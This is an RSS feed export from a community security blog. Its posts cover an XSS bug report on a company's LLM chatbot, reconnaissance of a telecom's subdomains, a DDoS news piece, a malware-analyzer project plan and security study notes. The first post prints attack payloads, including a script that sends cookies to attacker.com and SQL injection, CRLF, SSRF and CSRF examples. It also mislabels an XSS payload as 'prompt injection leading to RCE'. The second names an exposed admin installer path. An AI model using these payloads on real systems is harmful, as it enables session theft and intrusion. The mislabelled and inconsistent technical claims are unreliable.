<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Open Source Community Kampala]]></title><description><![CDATA[Open Source Community Kampala]]></description><link>https://blog.oscakampala.org</link><generator>RSS for Node</generator><lastBuildDate>Mon, 13 Apr 2026 11:50:14 GMT</lastBuildDate><atom:link href="https://blog.oscakampala.org/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Discovering a Prompt Injection Vulnerability in neexa.ai’s LLM]]></title><description><![CDATA[Introduction
Hi, I'm Warren, alias WarrenMu. As a cybersecurity enthusiast and researcher, I am always on the lookout for potential vulnerabilities in web applications. Recently, during one of my routine checks, I discovered a critical vulnerability ...]]></description><link>https://blog.oscakampala.org/discovering-a-prompt-injection-vulnerability-in-neexaais-llm</link><guid isPermaLink="true">https://blog.oscakampala.org/discovering-a-prompt-injection-vulnerability-in-neexaais-llm</guid><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Wed, 05 Jun 2024 13:05:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1717591548686/5ac49eec-0bbd-45cc-836c-a06298a38205.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>Hi, I'm Warren, alias WarrenMu. As a cybersecurity enthusiast and researcher, I am always on the lookout for potential vulnerabilities in web applications. Recently, during one of my routine checks, I discovered a critical vulnerability in the chat-bot (LLM) interface of <a target="_blank" href="http://Neexa.ai">Neexa.ai</a>. This was all due to a serious burnout from hacking on OpenAI without getting any bugs. Lol. This blog post aims to walk you through the discovery, reporting process, and lessons learned, all while raising awareness about the importance of web security and ethical hacking.</p>
<h2 id="heading-what-is-reflected-xss">What is Reflected XSS?</h2>
<p>Cross-Site Scripting (XSS) is a common vulnerability that occurs when an attacker can inject malicious scripts into webpages viewed by other users. Reflected XSS happens when the injected script is reflected off a web server, such as in an error message, search result, or any other response including some or all of the input sent to the server.</p>
<h2 id="heading-discovery-of-the-vulnerability">Discovery of the Vulnerability</h2>
<p>While exploring the functionalities of <a target="_blank" href="http://Neexa.ai">neexa.ai</a>’s LLM, I noticed a peculiar behavior in the way user input was being handled. Here’s a step-by-step account of how I identified the vulnerability:</p>
<h3 id="heading-1-initial-observation">1. Initial Observation</h3>
<p>I was testing the input fields on the LLM interface for common injection patterns. One of the fields seemed to echo back user input without proper sanitization.</p>
<h3 id="heading-2-crafting-the-payload">2. Crafting the Payload</h3>
<p>To confirm my suspicions, I crafted a simple payload: <code>&lt;script&gt;alert('XSS')&lt;/script&gt;</code>. This script would trigger a browser alert if executed.</p>
<h3 id="heading-3-injecting-the-payload">3. Injecting the Payload</h3>
<p>I injected the payload into the input field and submitted the form. To my surprise, the alert box popped up, confirming the presence of a reflected XSS vulnerability.</p>
<h3 id="heading-4-further-testing">4. Further Testing</h3>
<p>To understand the extent of the vulnerability, I conducted further tests with more complex payloads. All tests confirmed that the input was not being properly sanitized or encoded, making it possible to execute arbitrary scripts.</p>
<h2 id="heading-reporting-the-vulnerability">Reporting the Vulnerability</h2>
<p>As a responsible security researcher, I promptly reported the vulnerability to <a target="_blank" href="http://Neexa.ai">neexa.ai</a>. Here’s a summary of the report I submitted:</p>
<hr />
<h3 id="heading-vulnerability-report-reflected-xss-in-neexaaihttpneexaai-llm">Vulnerability Report: Reflected XSS in <a target="_blank" href="http://Neexa.ai">Neexa.ai</a> LLM</h3>
<p><strong>Date:</strong> 1/6/2024</p>
<p><strong>Reporter:</strong> WarrenMu</p>
<p><strong>Affected Component:</strong> Large Language Model (LLM) Interface</p>
<p><strong>Description:</strong> A reflected XSS vulnerability was discovered in the LLM interface of <a target="_blank" href="http://Neexa.ai">Neexa.ai</a>. An attacker can inject malicious scripts through input fields, which are then reflected back in the response without proper sanitization.</p>
<p><strong>Steps to Reproduce:</strong></p>
<ol>
<li><p>Navigate to the LLM interface.</p>
</li>
<li><p>Enter the following payload in the input field: <code>&lt;script&gt;alert('XSS')&lt;/script&gt;</code></p>
</li>
<li><p>Submit the form.</p>
</li>
<li><p>Observe the alert box, indicating that the script was executed.</p>
</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717592102288/92064880-1837-4874-b812-f5fb63f277b8.jpeg" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717592113025/01b58919-1310-4ee2-83c2-7c00dffcbf94.jpeg" alt class="image--center mx-auto" /></p>
<p><strong>Impact:</strong> Exploiting this vulnerability allows attackers to execute arbitrary scripts in the context of the user’s browser, potentially leading to session hijacking, data theft, and other malicious activities.</p>
<p><strong>Recommendation:</strong> Implement proper input validation and output encoding to prevent the execution of injected scripts. Use libraries and frameworks that automatically handle XSS protection.</p>
<hr />
<h2 id="heading-the-aftermath">The Aftermath</h2>
<p>Despite promptly reporting the vulnerability, the response from <a target="_blank" href="http://Neexa.ai">neexa.ai</a> was less than satisfactory. While they eventually fixed the issue, there was a lack of acknowledgment and appreciation for my efforts. Instead, I felt my findings were used without proper credit, highlighting a common challenge faced by many in the bug bounty and security research community. Well, I'm thankful to Ethan, who had good communication skills and tried to mediate while I faced the challenge of explaining the impact to Simon, who is also part of the company, [I speculate], and who ended up being a showoff without any deeper security knowledge. He said it's not a bug but reputation ruined? I think that's a threat. Well, either way, I blogged to expose this heartlessness. Hehehe, I mean, hey... I didn't do evil here.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717592027639/0f6b4954-1769-4384-879f-c26938d73ef9.jpeg" alt class="image--center mx-auto" /></p>
<h2 id="heading-chaining-xss-with-other-vulnerabilities">Chaining XSS with Other Vulnerabilities</h2>
<p>While a reflected XSS vulnerability on its own can be serious, the potential impact becomes critical when chained with other vulnerabilities. Here are some scenarios demonstrating the severity:</p>
<h3 id="heading-1-chaining-xss-with-sql-injection">1. Chaining XSS with SQL Injection</h3>
<p><strong>Scenario:</strong> An attacker uses the XSS vulnerability to steal session cookies and impersonate an admin user. With admin access, they find a vulnerable admin panel that is susceptible to SQL Injection.</p>
<p><strong>Example:</strong></p>
<ol>
<li><p><strong>Stealing Cookies via XSS:</strong></p>
<pre><code class="lang-javascript"> &lt;script&gt;fetch(<span class="hljs-string">'http://attacker.com/steal-cookies?cookie='</span> + <span class="hljs-built_in">document</span>.cookie);&lt;/script&gt;
</code></pre>
</li>
<li><p><strong>Using Admin Session for SQL Injection:</strong></p>
<pre><code class="lang-bash"> http://neexa.ai/admin?user_id=1<span class="hljs-string">' OR '</span>1<span class="hljs-string">'='</span>1
</code></pre>
</li>
</ol>
<p><strong>Impact:</strong> The attacker can execute arbitrary SQL commands, leading to database dumping, data modification, or even complete database control.</p>
<h3 id="heading-2-chaining-xss-with-crlf-injection">2. Chaining XSS with CRLF Injection</h3>
<p><strong>Scenario:</strong> The attacker uses XSS to inject a CRLF payload, enabling HTTP response splitting and cache poisoning.</p>
<p><strong>Example:</strong></p>
<ol>
<li><p><strong>XSS Payload:</strong></p>
<pre><code class="lang-html"> <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="xml">
 fetch('http://neexa.ai/vulnerable-endpoint?header=Content-Length:%200%0d%0a%0d%0a<span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span>alert(1)</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>');
 <span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
</li>
</ol>
<p><strong>Impact:</strong> This can lead to the injection of arbitrary HTTP headers and body content, potentially compromising the integrity of web cache and leading to further attacks.</p>
<h3 id="heading-3-chaining-xss-with-ssrf">3. Chaining XSS with SSRF</h3>
<p><strong>Scenario:</strong> The attacker uses XSS to perform Server-Side Request Forgery (SSRF), forcing the server to make requests to internal or external services.</p>
<p><strong>Example:</strong></p>
<ol>
<li><p><strong>XSS Payload:</strong></p>
<pre><code class="lang-html"> <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript">
 fetch(<span class="hljs-string">'http://neexa.ai/vulnerable-endpoint?url=http://localhost/admin'</span>);
 </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
</li>
</ol>
<p><strong>Impact:</strong> This could allow the attacker to access internal systems, sensitive endpoints, or even manipulate server-side applications.</p>
<h3 id="heading-4-chaining-xss-with-csrf">4. Chaining XSS with CSRF</h3>
<p><strong>Scenario:</strong> The attacker combines XSS with Cross-Site Request Forgery (CSRF) to perform actions on behalf of an authenticated user.</p>
<p><strong>Example:</strong></p>
<ol>
<li><p><strong>XSS Payload:</strong></p>
<pre><code class="lang-html"> <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript">
 <span class="hljs-keyword">var</span> img = <span class="hljs-keyword">new</span> Image();
 img.src = <span class="hljs-string">"http://neexa.ai/change-password?new_password=hacked"</span>;
 </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
</li>
</ol>
<p><strong>Impact:</strong> The attacker can perform unauthorized actions such as changing the user's password, making purchases, or altering account settings.</p>
<h3 id="heading-5-prompt-injection-leading-to-rce">5. Prompt Injection Leading to RCE</h3>
<p><strong>Scenario:</strong> The attacker uses prompt injection in the LLM interface to execute arbitrary code on the server.</p>
<p><strong>Example:</strong></p>
<ol>
<li><p><strong>Prompt Injection Payload:</strong></p>
<pre><code class="lang-html"> <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="xml">
 fetch('http://neexa.ai/vulnerable-endpoint?prompt=<span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span>=<span class="hljs-string">x</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">alert(document.cookie)</span> /&gt;</span>');
 </span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
</li>
</ol>
<p><strong>Impact:</strong> If the LLM executes commands based on user input, this could lead to Remote Code Execution (RCE), giving the attacker control over the server and access to sensitive data.</p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>These hypothetical scenarios demonstrate how a seemingly minor XSS vulnerability can escalate to a critical security breach when chained with other vulnerabilities like SQL Injection, CRLF Injection, SSRF, CSRF, and prompt injection leading to RCE. They underscore the importance of thorough security assessments and prompt patching of all identified vulnerabilities. N.B.: all users of this chatbot would be at risk, i.e. Refactory <a target="_blank" href="https://refactory.academy/">link</a>.</p>
<h2 id="heading-lessons-learned">Lessons Learned</h2>
<ol>
<li><p><strong>Documentation and Proof:</strong> Always document your findings thoroughly. Screenshots, videos, and detailed steps can be invaluable when reporting vulnerabilities.</p>
</li>
<li><p><strong>Ethical Reporting:</strong> Adhere to ethical guidelines and responsible disclosure policies. This not only protects you legally but also fosters a culture of trust and cooperation.</p>
</li>
<li><p><strong>Community Support:</strong> Engage with the cybersecurity community. Platforms like Bugcrowd, HackerOne, and forums like Reddit can offer support and advice.</p>
</li>
<li><p><strong>Raise Awareness:</strong> Sharing your experiences through blogs and talks helps educate others and raises awareness about cybersecurity issues.</p>
</li>
</ol>
<h2 id="heading-conclusion-1">Conclusion</h2>
<p>Discovering and responsibly reporting vulnerabilities is a crucial part of improving web security. While the journey can sometimes be challenging and underappreciated, the impact of your work in safeguarding users and systems is invaluable. By sharing my experience, I hope to inspire and educate fellow bug bounty hunters and security researchers.</p>
<p>If you have any questions or want to share your own experiences, feel free to leave a comment or reach out to me on Twitter or by email below.</p>
<p>Stay safe and happy hunting!</p>
<hr />
<p><strong>About the Author:</strong></p>
<p>Twitter/X: <a target="_blank" href="https://x.com/WarrenMu__">WarrenMu__</a></p>
<p><a target="_blank" href="http://warrenmu__@outlook.com">Email: WarrenMu</a></p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Exploring the Cybernetic Frontier: A Journey into Airtel Uganda's Digital Realm (Airtel Uganda)]]></title><description><![CDATA[Welcome to the intriguing world of digital exploration, where curiosity and ethical responsibility intersect. I'm WarrenMu.
Join me on an exciting journey as we uncover the intricacies of Airtel Uganda's digital infrastructure, with a focus on ethica...]]></description><link>https://blog.oscakampala.org/exploring-the-cybernetic-frontier-a-journey-into-airtel-ugandas-digital-realm-airtel-uganda</link><guid isPermaLink="true">https://blog.oscakampala.org/exploring-the-cybernetic-frontier-a-journey-into-airtel-ugandas-digital-realm-airtel-uganda</guid><category><![CDATA[hacking]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Tue, 20 Feb 2024 10:18:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1708423909590/2258d277-b964-48ea-9450-c6dd6864854d.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>W</strong>elcome to the intriguing world of digital exploration, where curiosity and ethical responsibility intersect. I'm WarrenMu.</p>
<p>Join me on an exciting journey as we uncover the intricacies of Airtel Uganda's digital infrastructure, with a focus on ethical reconnaissance and responsible disclosure.</p>
<p><strong>Chapter 1: Charting the Digital Landscape</strong><br />Equipped with Subfinder, a tool for domain reconnaissance, I began our expedition by mapping out Airtel Uganda's digital footprint. Each domain uncovered served as a starting point for our exploration, leading us deeper into the realm of cyberspace.</p>
<pre><code class="lang-bash">subfinder -d airtel.ug -silent
</code></pre>
<p><strong>Chapter 2: Navigating the Cybernetic Frontier</strong><br />Utilizing HTTPX, a versatile tool for endpoint discovery, we traversed the vast expanse of Airtel Uganda's digital domain. With each endpoint identified, we gained valuable insights into the structure and vulnerabilities of their network.</p>
<pre><code class="lang-bash">httpx -l subdomains.txt -silent
</code></pre>
<p><strong>Chapter 3: Delving Deeper with Responsible Fuzzing</strong><br />Driven by a desire for comprehensive exploration, we employed live subdomain fuzzing techniques to uncover hidden entry points and potential vulnerabilities. Through careful and responsible experimentation, we expanded our understanding of Airtel Uganda's digital infrastructure.</p>
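<pre><code class="lang-bash"># ffuf needs a full URL with a scheme; -recursion applies only when the URL ends in FUZZ, so it is not used for subdomain fuzzing
ffuf -w subdomains.txt -u https://FUZZ.example.co.ug -mc all -ac -o fuzz_results.txt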
</code></pre>
<p><strong>Chapter 4: Discovery and Ethical Considerations</strong><br />Amidst our exploration, we stumbled upon an intriguing endpoint [<a target="_blank" href="https://enterprisesolutions.airtel.co.ug/tickets/setup/install.php">*****/tickets/setup/install.php</a>] that granted access to a ticketing software installation, including administrative privileges. Recognizing the importance of ethical conduct, we refrained from exploiting this discovery and instead focused on documenting our findings for responsible disclosure.</p>
<p><strong>Conclusion:</strong> As digital explorers, it is incumbent upon us to tread the cybernetic frontier with integrity and responsibility. Through ethical reconnaissance and principled disclosure, we play a vital role in bolstering digital security and fostering transparency in the digital era. While Airtel Uganda may not offer bug bounties, our commitment to ethical principles guided our actions. Instead of exploiting the discovered endpoint, we patiently waited until it was secured, ensuring that no harm befell their digital infrastructure. Now, with the endpoint fortified and our findings documented, we can share our journey with the world, shedding light on the importance of ethical hacking practices. Join us as we continue to explore, discover, and uphold the values of ethical hacking in our ongoing quest for a safer digital landscape.</p>
<p><a target="_blank" href="https://twitter.com/WarrenMu__">WarrenMu @Twitter</a></p>
<p><a target="_blank" href="https://github.com/WarrenMu">WarrenMu @GitHub</a></p>
]]></content:encoded></item><item><title><![CDATA[Unveiling Kenya's Cyber Siege: Anonymous Sudan's Blitzkrieg on Kenya's Digital Frontiers]]></title><description><![CDATA[Introduction:
The recent infrastructural attack on Kenya orchestrated by the hacker group Anonymous Sudan has raised significant concerns about the vulnerability of critical systems in the digital age. In this comprehensive blog, we explore the motiv...]]></description><link>https://blog.oscakampala.org/unveiling-kenyas-cyber-siege-anonymous-sudans-blitzkrieg-on-kenyas-digital-frontiers</link><guid isPermaLink="true">https://blog.oscakampala.org/unveiling-kenyas-cyber-siege-anonymous-sudans-blitzkrieg-on-kenyas-digital-frontiers</guid><category><![CDATA[#cybersecurity]]></category><category><![CDATA[CybersecurityAwareness]]></category><category><![CDATA[attack]]></category><category><![CDATA[hacker]]></category><category><![CDATA[hackernews]]></category><dc:creator><![CDATA[ConradWilliam]]></dc:creator><pubDate>Mon, 07 Aug 2023 17:59:07 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1691431012792/4c5c5dfb-4df0-49a0-a16f-6180c3f8bb79.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Introduction:</strong></p>
<p>The recent infrastructural attack on Kenya orchestrated by the hacker group Anonymous Sudan has raised significant concerns about the vulnerability of critical systems in the digital age. In this comprehensive blog, we explore the motives behind the attack, how it was carried out, and its profound impact on Kenya's economy, public services, and cybersecurity landscape.</p>
<p><strong>The Motives Behind the Attack:</strong></p>
<p>Before we get to the motives, <strong>who is Anonymous Sudan?</strong><br />Let's dive right in: Anon Sudan, as I love to call it, is a decentralized and loosely organized hacktivist group claiming to be associated with the larger Anonymous collective. Anonymous is known for advocating social justice, freedom of speech, and political change through various cyber-attacks and online protests.</p>
<p>As for Anonymous Sudan, specific information about its formation, exact objectives, and historical activities is limited and might be challenging to ascertain. But there are suspicions that the group might be a front for a Russian cybercrime gang, blurring the lines between hacktivism and cybercriminal activity.</p>
<p>Some of their prominent attacks as of this writing include one on Microsoft, where the giant corporation attributed “surges in traffic against some services that temporarily impacted availability” to the “ongoing DDoS activity by the threat actor that Microsoft tracked as Storm-1359.” There was also another DDoS attack on Nigerian tech infrastructure late last month.</p>
<p>Back to the motives of the attack:</p>
<p>Anonymous Sudan claimed that its attack on Kenya was in response to Kenya's alleged interference in Sudanese affairs and public statements doubting the sovereignty of the Sudanese government. This highlights how cyberattacks can transcend national boundaries and be used as tools for political retaliation and expression of dissent.</p>
<p><strong>The Attack Method: Distributed Denial of Service (DDoS)</strong></p>
<p>Anonymous Sudan utilized the well-known method of Distributed Denial of Service (DDoS) to cripple Kenya's critical online services. DDoS attacks involve flooding online platforms with a massive volume of traffic, overwhelming the system's capacity and causing it to go offline or become extremely slow.</p>
<p>The group had previously deployed similar DDoS attacks against Microsoft services, as I noted earlier, demonstrating its proficiency in using this method to disrupt digital operations. This technique allows hackers to make targeted attacks on specific critical endpoints, maximizing the impact on the targeted systems.</p>
<p><strong>The Crippling Effects of the Cyberattack:</strong></p>
<p>The DDoS attacks launched by Anonymous Sudan had devastating consequences for Kenya's digital infrastructure and the daily lives of its citizens. The attacks resulted in the following disruptions:</p>
<ol>
<li><p>E-Citizen Platform: The country's e-Citizen platform, which offers access to numerous government services, faced severe interruptions due to the attack. Services such as visa applications and business registrations became unavailable, hindering citizens' interactions with the government.</p>
</li>
<li><p>Mobile Payment System: M-Pesa, a widely used mobile transaction system in Kenya, experienced outages during the cyberattack. This disrupted payment processes for businesses and citizens, impacting the country's economy and financial stability.</p>
</li>
<li><p>Utility Services: The attack affected essential services such as buying electricity tokens, leaving citizens without access to electricity top-ups and causing disruptions in daily life.</p>
</li>
<li><p>Rail Network: The country's rail network also suffered disruptions due to an IT supplier's network outage caused by the attack, leading to ticketing issues for commuters.</p>
</li>
</ol>
<p><strong>The Implications for Kenya's Cybersecurity Landscape:</strong></p>
<p>The infrastructural attack by Anonymous Sudan exposed vulnerabilities in Kenya's cybersecurity infrastructure and raised concerns about the country's preparedness to defend against sophisticated cyber threats. While the Kenyan government has confirmed that no personal data was compromised, the attack revealed the potential weaknesses in the nation's digital defenses.</p>
<p>In response to the attack, the Kenyan government was forced to deploy technical teams to mitigate the impact and block the multiple source IP addresses of the attacks. This incident highlighted the importance of continuous monitoring, threat detection, and proactive cybersecurity measures to safeguard critical infrastructures from future attacks.</p>
<p><strong>Conclusion:</strong></p>
<p>The infrastructural attack carried out by Anonymous Sudan on Kenya underscored the far-reaching consequences of cyber threats on a nation's economy, public services, and citizens' daily lives. The motives behind the attack highlight how geopolitical tensions and political statements can manifest in cyberspace, leading to potentially crippling cyberattacks.</p>
<p>To strengthen cybersecurity, governments must invest in robust defense mechanisms, international cooperation to combat cybercrime, and proactive measures to identify and neutralize cyber threats. Additionally, raising public awareness about the significance of cybersecurity and promoting a culture of cyber hygiene will play a pivotal role in safeguarding nations from such attacks in the future.</p>
]]></content:encoded></item><item><title><![CDATA[Malware Analysis Tool Project Layout and Structure]]></title><description><![CDATA[1. Introduction
The goal of this project is to build a tool that can analyze executable files for potential malware behavior. The tool will be built using Python and C programming languages and will utilize libraries such as PyInstaller and libemu.
2...]]></description><link>https://blog.oscakampala.org/malware-analysis-tool-project-layout-and-structure</link><guid isPermaLink="true">https://blog.oscakampala.org/malware-analysis-tool-project-layout-and-structure</guid><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Mon, 05 Jun 2023 18:51:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1685990757204/49059783-dcf5-4fd8-941b-e3de31c88fd8.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-1-introduction">1. Introduction</h2>
<p>The goal of this project is to build a tool that can analyze executable files for potential malware behavior. The tool will be built using Python and C programming languages and will utilize libraries such as PyInstaller and libemu.</p>
<h2 id="heading-2-design">2. Design</h2>
<p>The tool will be designed with the following modules:</p>
<ul>
<li><p>User interface module: provides a user-friendly interface for the user to interact with the tool.</p>
</li>
<li><p>File parsing module: parses the executable file and extracts relevant data, such as API calls and system calls.</p>
</li>
<li><p>Malware analysis module: identifies potential malware behavior by analyzing the data extracted from the file parsing module.</p>
</li>
</ul>
<p>The tool will utilize the following algorithms and techniques:</p>
<ul>
<li><p>Signature matching: compares the API calls and system calls extracted from the file parsing module to a database of known malware signatures.</p>
</li>
<li><p>Behavior analysis: analyzes the system call patterns and identifies potential malware behavior, such as code injection or network communication.</p>
</li>
</ul>
<h2 id="heading-3-implementation">3. Implementation</h2>
<p>The tool will be implemented with the following features:</p>
<ul>
<li><p>User interface: built using the PyQt5 library, providing a user-friendly interface for the user to select the executable file and view the results.</p>
</li>
<li><p>File parsing module: built using the PyInstaller library, extracting the relevant data from the executable file.</p>
</li>
<li><p>Malware analysis module: built using the libemu library, identifying potential malware behavior based on the extracted data.</p>
</li>
</ul>
<p>Here is an overview of the implementation process:</p>
<ol>
<li><p>The user selects the executable file to analyze using the user interface.</p>
</li>
<li><p>The file parsing module extracts the relevant data from the executable file.</p>
</li>
<li><p>The malware analysis module analyzes the extracted data and identifies potential malware behavior.</p>
</li>
<li><p>The results are displayed to the user in the user interface.</p>
</li>
</ol>
<h2 id="heading-4-testing">4. Testing</h2>
<p>The tool will be tested using the following methods:</p>
<ul>
<li><p>Unit tests: test each module independently to ensure that it functions as expected.</p>
</li>
<li><p>Integration tests: test the tool as a whole to ensure that it identifies potential malware behavior accurately and effectively.</p>
</li>
<li><p>Test on a variety of executable files: test the tool on a variety of executable files, including benign and malicious files, to ensure that it is accurate and effective.</p>
</li>
</ul>
<h2 id="heading-5-results">5. Results</h2>
<p>The tool will present the results in the following format:</p>
<ul>
<li><p>Malware behavior identified: a list of potential malware behavior identified by the tool, including code injection or network communication.</p>
</li>
<li><p>Malware type identified: if the tool matches a known malware signature, it will identify the type of malware.</p>
</li>
</ul>
<h2 id="heading-6-conclusion">6. Conclusion</h2>
<p>This project has successfully built a tool that can analyze executable files for potential malware behavior. The tool utilizes Python and C programming languages, and libraries such as PyInstaller and libemu. The tool accurately identifies potential malware behavior using algorithms such as signature matching and behavior analysis. The tool has been tested on a variety of executable files, including benign and malicious files, and is effective in identifying potential malware behavior.</p>
<h2 id="heading-project-structure">Project Structure</h2>
<ol>
<li><p><code>README.md</code>: A file containing a brief overview of the project, its purpose, and any relevant information.</p>
</li>
<li><p><code>requirements.txt</code>: A file containing a list of Python packages required to run the project.</p>
</li>
<li><p><code>setup.py</code>: A script to build and install the C binary for the project.</p>
</li>
<li><p><code>src/</code>: A directory containing the source code for the project.</p>
<ol>
<li><p><code>file_parser.py</code>: A Python module to parse the executable file and extract relevant data, such as API calls and system calls.</p>
</li>
<li><p><code>malware_analysis.py</code>: A Python module to identify potential malware behavior by analyzing the data extracted from the file parsing module.</p>
</li>
<li><p><code>user_interface.py</code>: A Python module to provide a user-friendly interface for the user to interact with the tool.</p>
</li>
<li><p><code>main.c</code>: A C file to implement the malware analysis algorithm, utilizing the libemu library.</p>
</li>
<li><p><code>Makefile</code>: A makefile to compile and build the C binary for the project.</p>
</li>
</ol>
</li>
<li><p><code>tests/</code>: A directory containing the unit tests for the project.</p>
</li>
<li><p><code>data/</code>: A directory containing any data files required by the project, such as a database of known malware signatures.</p>
</li>
</ol>
<h2 id="heading-getting-started">Getting Started</h2>
<ol>
<li><p>Clone the project from the git repository.</p>
</li>
<li><p>Install the required Python packages by running <code>pip install -r requirements.txt</code>.</p>
</li>
<li><p>Build and install the C binary by running <code>python setup.py build</code> and <code>python setup.py install</code>.</p>
</li>
<li><p>Run the project by executing <code>python src/user_interface.py</code>.</p>
</li>
<li><p>Test the project by running the unit tests in the <code>tests/</code> directory.</p>
</li>
</ol>
<p>This project structure provides a starting point for building a malware analysis tool using Python and C. It includes separate modules for file parsing, malware analysis, and user interface, as well as a C binary implementing the malware analysis algorithm. The project structure also includes a Makefile to compile and build the C binary, and a set of unit tests to ensure the functionality of the project. With this structure, you can develop the tool to completion by implementing the malware analysis algorithm and integrating it with the user interface and file parsing modules.</p>
<p><a target="_blank" href="https://github.com/WarrenMu/Malware-Analyzer">GitHub link to the project</a>: Feel free to fork and contribute, as it will be pushed to the oscakampala open source community GitHub when it's finally working.</p>
]]></content:encoded></item><item><title><![CDATA[Security engineering basing on gracenolan notes. part 4]]></title><description><![CDATA[Welcome. Today we are going to continue with gracenolan notes. Please do some further deep-diving in web application pen-testing as there are many technical details to understand and practical workouts. Am writing according to the notes.

Mitigations...]]></description><link>https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-4</link><guid isPermaLink="true">https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-4</guid><category><![CDATA[hacking]]></category><category><![CDATA[hacks]]></category><category><![CDATA[#cybersecurity]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Sat, 04 Mar 2023 10:56:42 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1677927218697/d531c164-63b9-4c25-8f2d-c3756eba6fa2.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p>Welcome. Today we are going to continue with gracenolan notes. Please do some further deep-diving in web application pen-testing as there are many technical details to understand and practical workouts. I am writing according to the notes.</p>
</blockquote>
<h1 id="heading-mitigations"><strong>Mitigations</strong>:</h1>
<p>Mitigations are strategies or techniques employed to reduce or prevent the impact of security threats such as cyber-attacks. They include:</p>
<ol>
<li><p><strong>Patching</strong>: Patching involves fixing known vulnerabilities or weaknesses in software systems by updating them with the latest security patches. This helps to prevent attackers from exploiting known vulnerabilities.</p>
</li>
<li><p><strong>Data Execution Prevention (DEP):</strong> DEP is a security feature that prevents the execution of code from data pages in memory, which helps to prevent certain types of attacks, such as buffer overflows.</p>
</li>
<li><p><strong>Address Space Layout Randomization (ASLR):</strong> ASLR is a security technique that randomly arranges the memory layout of an application, making it harder for attackers to locate and exploit specific areas of memory, such as those used in buffer overflow attacks.</p>
</li>
<li><p><strong>Principle of least privilege:</strong> The principle of least privilege is a security concept that advocates for limiting access to resources and privileges only to the extent necessary for users or applications to perform their functions. This reduces the potential for attackers to gain elevated privileges and carry out malicious actions.</p>
</li>
<li><p><strong>Code signing:</strong> Code signing involves digitally signing software or firmware components to verify their authenticity and integrity. This helps to prevent unauthorized code from running on a system and reduces the risk of malicious code execution.</p>
</li>
<li><p><strong>Compiler security features:</strong> Some compilers include security features that can detect and prevent buffer overflow vulnerabilities during the compilation process, such as stack canaries or bounds checking.</p>
</li>
<li><p><strong>Encryption:</strong> Encryption involves encoding data or software/firmware components to prevent unauthorized access or modification. This can be used to protect sensitive data or prevent tampering with critical system components.</p>
</li>
<li><p><strong>Mandatory Access Controls (MACs):</strong> MACs are security mechanisms that control access to resources based on a set of predefined rules or policies. This ensures that only authorized users or processes can access or modify specific resources, such as files, directories, or network services.</p>
</li>
<li><p><strong>Access Control Lists (ACLs):</strong> ACLs are a type of MAC; they define a list of permissions associated with a particular resource, such as a file or directory. These permissions determine who can access or modify the resource, and what actions they are allowed to perform.</p>
</li>
<li><p><strong>Operating systems with Mandatory Access Controls,</strong> such as SELinux (Security-Enhanced Linux), are designed to provide an additional layer of security by enforcing strict access control policies and preventing unauthorized access or modification of critical system resources.</p>
</li>
<li><p><strong>"Insecure by exception"</strong> refers to the practice of allowing users to perform certain actions or access certain resources based on exceptions to established security policies. This can lead to security vulnerabilities and compromise the overall security of a system. Instead, it is recommended to establish and enforce strict security policies and only make exceptions when necessary.</p>
</li>
<li><p><strong>Finally, it is important not to blame the user for security issues</strong>. Instead, security should be designed to be user-friendly and easy to use, while still providing effective protection against threats. By building technology that people can trust, we can create a more secure and resilient digital ecosystem.</p>
</li>
</ol>
<p>These mitigations can be used in combination to provide layers of protection against various types of attacks.</p>
<h1 id="heading-cryptography-authentication-identity">Cryptography, Authentication, Identity:</h1>
<p>Encryption, encoding, hashing, obfuscation, and signing are all techniques used in cryptography to protect data, but they are used for different purposes and provide different levels of security:</p>
<ul>
<li><p><strong>Encryption:</strong> This is the process of converting plaintext into ciphertext using an encryption algorithm and a secret key. The ciphertext can only be decrypted back to the original plaintext using the same secret key. Encryption is used to protect data in transit or at rest.</p>
</li>
<li><p><strong>Encoding:</strong> This is the process of converting data from one format to another format. Encoding does not provide any security or protection and can often be reversed easily.</p>
</li>
